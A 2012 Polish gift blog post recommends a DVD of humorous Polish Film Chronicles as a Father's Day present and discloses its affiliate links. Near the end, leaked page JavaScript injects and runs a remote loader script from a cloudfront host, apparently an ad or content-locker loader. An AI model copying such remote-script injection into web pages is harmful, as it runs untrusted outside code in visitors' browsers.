Prezentuję tydzień prezentów dla naszych Ojców

18 czerwca 2012
Przeszłość na wesoło

Zacznę od przeprosin i nieudolnych prób usprawiedliwiania się – w ostatnich dniach częstotliwość wpisów na blogu odpowiadała częstotliwości zwycięstw polskiej reprezentacji podczas piłkarskich mistrzostw Europy czyli była żadna. Nic na to nie poradzę, że jako prawdziwy kibic ostatnio dużo czasu spędzam oglądając mecze, co siłą rzeczy oznacza mniej czasu na blogowanie. Ale skoro nasza reprezentacja pożegnała się już z turniejem, a wraz z zakończeniem fazy grupowej ilość meczy do rozegrania i ich częstotliwość także się zmniejszy, mam nadzieję w najbliższym czasie trochę nadrobić ostatnie zaległości.

Tak jak wcześniej zapowiadałam z okazji sobotniego Dnia Ojca w tym tygodniu będę prezentować Wam pomysły na podarunki dla naszych tatusiów. I tradycyjnie zaczniemy od małego przypomnienia opisywanych już prezentów, które sprawdziłam na własnym Tacie lub Tacie Pana M.:
koszulki dla dużych ze sklepu dla małych;
łamigłówki; oraz
audiobooki.


Po tym, przydługim chyba, wstępie pora na dzisiejszą propozycję prezentową. Co tu kryć, większość naszych ojców lata młodości przeżyła w PRLu i pomimo wszystkich wad tamtego systemu wspominają te czasy z pewnym sentymentem, bo przecież byli wtedy piękni i młodzi. Dlatego właśnie dobrym prezentem są rzeczy przypominające te lata, ale raczej z tej wesołej, a nie smutnej perspektywy. Takim prezentem jest właśnie wydanie DVD najzabawniejszych Polskich Kronik Filmowych. 

Najzabawniejsze Polskie Kroniki Filmowe lata 1945-1989 – cena: 123,99 zł (www.merlin.pl)

Ten zestaw DVD dostał od nas w prezencie pewien mężczyzna z naszej rodziny (ale nie mój Tata ani Tata Pana M.) z innej okazji w ubiegłym roku i jako że też w tamtych latach był piękny i młody niezwykle się z niego ucieszył. Zatem prezent przetestowany został pozytywnie i jako taki może zostać Wam polecony.

P.S. Zdjęcie pochodzi ze strony www.merlin.pl

Zawarte w tym wpisie linki do sklepu Merlin to tak zwane linki afiliacyjne. Oznacza to, iż jeśli klikając na nie dokonacie zakupu otrzymam z tego tytułu prowizję. Nie zmieni to w żaden sposób ceny jaką Wy zapłacicie za zamówione produkty, a pokaże mi, że doceniacie moje rekomendacje. Będę Wam bardzo wdzięczna za korzystanie z tych linków.


if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi: ,

Kategoria: , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję zestaw dla łakomczuchów

Następny

Prezentuję psa, który jeździ autem

Comments are closed here.